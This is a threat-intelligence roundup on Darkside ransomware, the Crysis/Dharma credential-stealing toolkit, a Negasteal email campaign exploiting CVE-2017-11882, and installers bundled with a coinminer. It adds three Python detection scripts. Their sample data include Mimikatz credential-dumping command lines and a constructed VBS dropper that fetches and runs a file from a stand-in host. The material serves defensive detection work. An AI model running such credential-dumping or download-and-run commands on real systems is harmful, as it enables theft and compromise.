Insights and analysis by Miguel Ang, Raphael Centeno, Don Ovid Ladores, Nikko Tamaña, and Llallum Victoria
In the past few weeks, we have spotted notable developments for different types of threats. For ransomware, a new family named Darkside surfaced, while operators behind Crysis/Dharma released a hacking toolkit. For messaging threats, a targeted email campaign was used to propagate Negasteal/Agent Tesla. Finally, for fileless threats, a coinminer was seen bundled with legitimate applications.
Read on to know more about these findings.
Darkside ransomware surfaced
A new ransomware family named Darkside (detected by Trend Micro as Ransom.Win32.DARKSIDE.YXAH-THA) has emerged. Its operators threaten to publish the data of victims who do not pay, the same tactic used by the operators of Maze and Nefilim. The extension appended to encrypted file names is derived from the victim machine's MAC address.
According to the ransomware's Tor webpage, the operators assess a target company's finances before deciding how much ransom to demand. The page also claims that they will not attack organizations in the medical, education, non-profit, and government sectors.
Figure 1. A Darkside ransom note
Crysis operators released a hacking tool kit
The operators behind Crysis/Dharma ransomware (detected by Trend Micro as Ransom.Win32.CRYSIS.TIBGGS) have released a hacking toolkit named Toolbox, Sophos reports. Toolbox bundles Mimikatz for harvesting credentials from memory, NirSoft Remote Desktop PassView for recovering saved remote desktop protocol (RDP) passwords, Hash Suite Tools Free for dumping password hashes, and further utilities for locating target machines and deploying the ransomware payload. With this kit, even inexperienced attackers can move through a network with little effort.
Crysis is run as ransomware-as-a-service (RaaS), and the toolkit lowers the skill needed for affiliates to spread the ransomware to more targets.
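The practical question for defenders is how the use of such a kit shows up in telemetry. The following is an added example, not code from Trend Micro, Sophos or the Toolbox kit: it runs three rules over constructed Sysmon-style log lines (process creation, event 1, and process access, event 10). The tool file names, Mimikatz command-line fragments, LSASS access masks and allow-list are assumed indicators taken from public tool documentation, not from the kit itself; the renamed-binary case in the sample shows why the command-line and LSASS-access rules matter more than file names.

```python
"""Spot use of the credential-harvesting tools bundled in the Crysis/Dharma
"Toolbox" (Mimikatz, NirSoft Remote Desktop PassView, Hash Suite) in
Sysmon-style process logs. Added example; the log lines are constructed and
the indicator values are assumptions drawn from public tool documentation."""
import re

# Assumed file names the tools ship under (trivially renamed by an attacker,
# hence the command-line and LSASS-access rules below).
TOOL_IMAGE_NAMES = {"mimikatz.exe", "rdpv.exe", "hash_suite_64.exe", "hash_suite_32.exe"}
# Mimikatz module syntax survives a rename of the binary.
TOOL_CMDLINE_MARKERS = ("sekurlsa::", "lsadump::", "privilege::debug")
# Access masks commonly requested when reading credentials out of LSASS
# (Sysmon event 10, GrantedAccess); assumed, tune against your own baseline.
SUSPICIOUS_LSASS_ACCESS = {0x1010, 0x1410, 0x1438, 0x143A, 0x1FFFFF}
# Processes that legitimately open LSASS with broad rights on a stock host (assumed).
LSASS_ACCESS_ALLOWLIST = {"csrss.exe", "wininit.exe", "msmpeng.exe"}

KV_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_line(line: str) -> dict:
    """Parse one 'Key="value" Key="value"' log line into a dict."""
    return dict(KV_RE.findall(line))


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict):
    """Return a rule name if the event matches, else None."""
    eid = event.get("EventID")
    if eid == "1":  # process creation
        if basename(event.get("Image", "")) in TOOL_IMAGE_NAMES:
            return "credential-tool-image"
        cmd = event.get("CommandLine", "").lower()
        if any(marker in cmd for marker in TOOL_CMDLINE_MARKERS):
            return "credential-tool-cmdline"
    elif eid == "10":  # process access
        target = basename(event.get("TargetImage", ""))
        source = basename(event.get("SourceImage", ""))
        access = int(event.get("GrantedAccess", "0"), 16)
        if (target == "lsass.exe" and source not in LSASS_ACCESS_ALLOWLIST
                and access in SUSPICIOUS_LSASS_ACCESS):
            return "lsass-access"
    return None


def scan(lines) -> list:
    """Return (rule, offending image) pairs for every matching line."""
    hits = []
    for line in lines:
        event = parse_line(line)
        rule = classify(event)
        if rule:
            hits.append((rule, event.get("Image") or event.get("SourceImage")))
    return hits


# Constructed log lines in a simplified key="value" rendering of Sysmon fields.
SAMPLE_LOG = [
    r'EventID="1" Image="C:\Users\admin\Downloads\toolbox\mimikatz.exe" CommandLine="mimikatz.exe privilege::debug sekurlsa::logonpasswords exit"',
    r'EventID="1" Image="C:\Windows\System32\svchost.exe" CommandLine="svchost.exe -k netsvcs"',
    r'EventID="1" Image="C:\tmp\mk.exe" CommandLine="mk.exe sekurlsa::logonpasswords"',
    r'EventID="10" SourceImage="C:\tmp\mk.exe" TargetImage="C:\Windows\System32\lsass.exe" GrantedAccess="0x1010"',
    r'EventID="10" SourceImage="C:\Windows\System32\csrss.exe" TargetImage="C:\Windows\System32\lsass.exe" GrantedAccess="0x1FFFFF"',
    r'EventID="1" Image="C:\Users\admin\Downloads\toolbox\rdpv.exe" CommandLine="rdpv.exe /stext rdp.txt"',
]

if __name__ == "__main__":
    for rule, image in scan(SAMPLE_LOG):
        print(f"{rule:24} {image}")
```

On the sample, the renamed `mk.exe` is missed by the file-name rule but caught twice, once by its `sekurlsa::` argument and once by its LSASS handle; the `csrss.exe` access with a full mask is dropped by the allow-list. Real deployments should baseline the allow-list and access masks per environment, since backup agents and EDR sensors also open LSASS.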
Negasteal/Agent Tesla delivered via emails targeting bank account holders
We recently found emails that deliver Negasteal/Agent Tesla (detected by Trend Micro as TrojanSpy.MSIL.NEGASTEAL.DYSGXT) through malicious attachments. The campaign targets account holders of Krung Thai Bank: the email notifies the recipient of a supposed "outward remittance transaction" worth almost US$9,000 to get them to open the attachment. The attached document exploits CVE-2017-11882 (Microsoft's "Microsoft Office Memory Corruption Vulnerability"), a memory corruption bug in the Office Equation Editor component that had been present for 17 years before it was patched in 2017, to download and run the malware payload.
Figure 2. Sample email with malicious attachment containing Negasteal
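Whatever the payload, a CVE-2017-11882 lure has to get Office to hand an embedded object to the Equation Editor, and that requires the Equation.3 class identifier {0002CE02-0000-0000-C000-000000000046} or its ProgID to be present somewhere in the file. The following is an added example, not Trend Micro's code or the campaign's document: a static triage function that checks RTF and OLE compound files for those markers. The sample documents are constructed stubs with no exploit content; the CLSID is public, and the other markers (the hex layout in RTF objdata, the `\objupdate` trick) are assumptions about how such lures are typically built.

```python
"""Static triage for document lures of the CVE-2017-11882 type: look for the
Equation.3 OLE object markers. Added example; the documents below are
constructed and carry no exploit, only the object markers a lure needs."""
import re

# CLSID of Equation.3 in on-disk (little-endian) layout of
# {0002CE02-0000-0000-C000-000000000046}.
EQUATION_CLSID_RAW = bytes.fromhex("02ce020000000000c000000000000046")
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def hex_pattern(raw: bytes):
    """Regex for `raw` written as RTF objdata hex, tolerating whitespace between bytes."""
    return re.compile(rb"\s*".join(re.escape(f"{b:02x}".encode()) for b in raw), re.I)


EQUATION_CLSID_HEX = hex_pattern(EQUATION_CLSID_RAW)
EQUATION_PROGID_HEX = hex_pattern(b"Equation.3")
# \objupdate makes Word load the object when the document opens, without a click.
RTF_OBJUPDATE = re.compile(rb"\\objupdate")


def inspect_document(data: bytes) -> dict:
    """Return indicator flags; 'suspicious' is set when any Equation.3 marker is present."""
    findings = {
        # Word accepts headers as short as {\rt, so do not key on the full {\rtf1 magic.
        "rtf": data.lstrip().startswith(b"{\\rt"),
        "ole_compound": data.startswith(OLE_MAGIC),
        "equation_clsid_raw": EQUATION_CLSID_RAW in data,
        "equation_clsid_hex": bool(EQUATION_CLSID_HEX.search(data)),
        "equation_progid": b"Equation.3" in data,
        "equation_progid_hex": bool(EQUATION_PROGID_HEX.search(data)),
        "objupdate": bool(RTF_OBJUPDATE.search(data)),
    }
    findings["suspicious"] = any(findings[k] for k in (
        "equation_clsid_raw", "equation_clsid_hex", "equation_progid", "equation_progid_hex"))
    return findings


# Constructed lure: objdata holds an OLE1 header (version, FormatID=2 embedded,
# class-name length) followed by the ProgID as hex; no payload follows.
SAMPLE_RTF_LURE = (
    b"{\\rtf1{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}"
    b"{\\*\\objdata 01050000 02000000 0b000000 " + b"Equation.3".hex().encode() + b"00 }}}"
)
SAMPLE_RTF_CLEAN = b"{\\rtf1\\ansi Outward remittance confirmation\\par}"
# Constructed OLE compound-file stub carrying the raw CLSID where a CompObj stream would.
SAMPLE_OLE_LURE = OLE_MAGIC + b"\x00" * 24 + EQUATION_CLSID_RAW + b"\x00" * 8

if __name__ == "__main__":
    for name, doc in (("rtf lure", SAMPLE_RTF_LURE), ("rtf clean", SAMPLE_RTF_CLEAN), ("ole lure", SAMPLE_OLE_LURE)):
        print(name, inspect_document(doc))
```

This is a triage filter, not a verdict: a legitimate document with a real equation carries the same CLSID, so hits should go to a sandbox or to a parser that checks the object's actual size and content. The durable fix is the November 2017 update that removed the vulnerable Equation Editor; the check above is for catching the lures on hosts that are still behind.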
Legitimate applications bundled with coinminer
We also found legitimate applications such as TeamViewer, Rufus, and YTD Video Downloader bundled with a fileless coinminer (detected by Trend Micro as Coinminer.Win32.MALXMR.THHADBO). The trojanized installers are not from the vendors' official download centers or app stores. When the bundle is run, the legitimate application and a malicious VBS script are dropped onto the system; the script then connects to a remote site to download the coinminer loader, which in turn loads the coinminer.
Bundling coinminers and other malware with legitimate installers (video conferencing apps are a frequent carrier) is not a new tactic, but users who are unaware of it may still download from unofficial sources and unwittingly compromise their own systems.
Figure 3. Coinminer bundled with TeamViewer installer
Figure 4. Obfuscated VBS file
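The VBS stage is the cheap place to catch this chain: it has to name a download object, a file-write object and a way to run the result, and obfuscation hides the strings, not the calls. The following is an added example, not Trend Micro's code and not the script from Figure 4: a small triage routine that undoes Chr()-concatenation (an assumed, commonly seen VBS obfuscation; the page does not say which scheme the sample used), then scores the decoded script on the primitives a download-and-run dropper needs and pulls out any URL that appears. The sample script and the download URL are constructed.

```python
"""Triage helper for VBS droppers bundled with trojanized installers. Added
example; the script below is constructed and Chr()-concatenation is an
assumed obfuscation style, not necessarily the one the real sample used."""
import re

CHR_CALL = re.compile(r"Chr\(\s*(\d{1,3})\s*\)", re.I)
# Two or more Chr(n) joined with '&' (single calls are left alone to avoid noise).
CHR_CHAIN = re.compile(r"Chr\(\s*\d{1,3}\s*\)(?:\s*&\s*Chr\(\s*\d{1,3}\s*\))+", re.I)
URL_RE = re.compile(r"https?://[^\s\"'&<>]+", re.I)
# Primitives a download-and-run dropper needs (assumed indicator list, extend as needed).
SUSPICIOUS_TOKENS = ("WScript.Shell", "MSXML2.XMLHTTP", "ADODB.Stream",
                     "SaveToFile", ".Run ", "Execute", "powershell", "-enc")


def obfuscate_chr(text: str) -> str:
    """Emit the Chr()&Chr() form an obfuscator produces; used here only to build the sample."""
    return "&".join(f"Chr({ord(c)})" for c in text)


def decode_chr_chains(script: str) -> str:
    """Replace each Chr chain with the quoted VBS string literal it evaluates to."""
    def rebuild(match):
        text = "".join(chr(int(n)) for n in CHR_CALL.findall(match.group(0)))
        return '"' + text.replace('"', '""') + '"'
    return CHR_CHAIN.sub(rebuild, script)


def extract_urls(script: str) -> list:
    return sorted(set(URL_RE.findall(script)))


def triage(script: str) -> dict:
    """Score a script: one point for any Chr chains, one per suspicious token, one for a URL; 3+ is flagged."""
    decoded = decode_chr_chains(script)
    lowered = decoded.lower()
    tokens = [t for t in SUSPICIOUS_TOKENS if t.lower() in lowered]
    chains = len(CHR_CHAIN.findall(script))
    urls = extract_urls(decoded)
    score = (1 if chains else 0) + len(tokens) + (1 if urls else 0)
    return {"chr_chains": chains, "tokens": tokens, "urls": urls,
            "score": score, "suspicious": score >= 3}


# Constructed dropper: object names and the download URL hidden as Chr chains,
# then the usual XMLHTTP -> ADODB.Stream -> WScript.Shell.Run sequence.
SAMPLE_VBS = "\n".join([
    f"Set sh = CreateObject({obfuscate_chr('WScript.Shell')})",
    f"u = {obfuscate_chr('http://loader.example/x.bin')}",
    'Set h = CreateObject("MSXML2.XMLHTTP")',
    'h.Open "GET", u, False',
    "h.Send",
    'Set st = CreateObject("ADODB.Stream")',
    "st.Type = 1: st.Open: st.Write h.responseBody",
    r'st.SaveToFile "C:\Users\Public\svc.exe", 2',
    r'sh.Run "C:\Users\Public\svc.exe", 0, False',
])

if __name__ == "__main__":
    print(decode_chr_chains(SAMPLE_VBS))
    print(triage(SAMPLE_VBS))
```

Running the URL extractor on the raw script finds nothing, while the decoded script yields the loader URL, which is the indicator worth blocking at the proxy. The threshold of 3 is a heuristic; a benign installer helper that only calls `WScript.Shell` scores 1 and passes.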
Defense against a variety of threats
The fast-paced nature of the cybersecurity landscape means that threats emerge at every turn, creating a never-ending race between threat actors and security researchers. Enterprises and individual users should keep abreast of developments so that they can perform the necessary actions to prevent these threats from compromising their systems. As the popular adage says, “knowing is half the battle”.
To tackle a variety of threats, enterprises and users are advised to develop good security practices with the help of the following:
Only download apps from official download centers or app stores.
Do not click links or open attachments in emails or other messages from untrusted sources.
Regularly update software and applications to ensure that the latest vulnerabilities are patched.
Equip systems with security solutions that can block and defend against threats.
The following solutions can help secure against a variety of threats: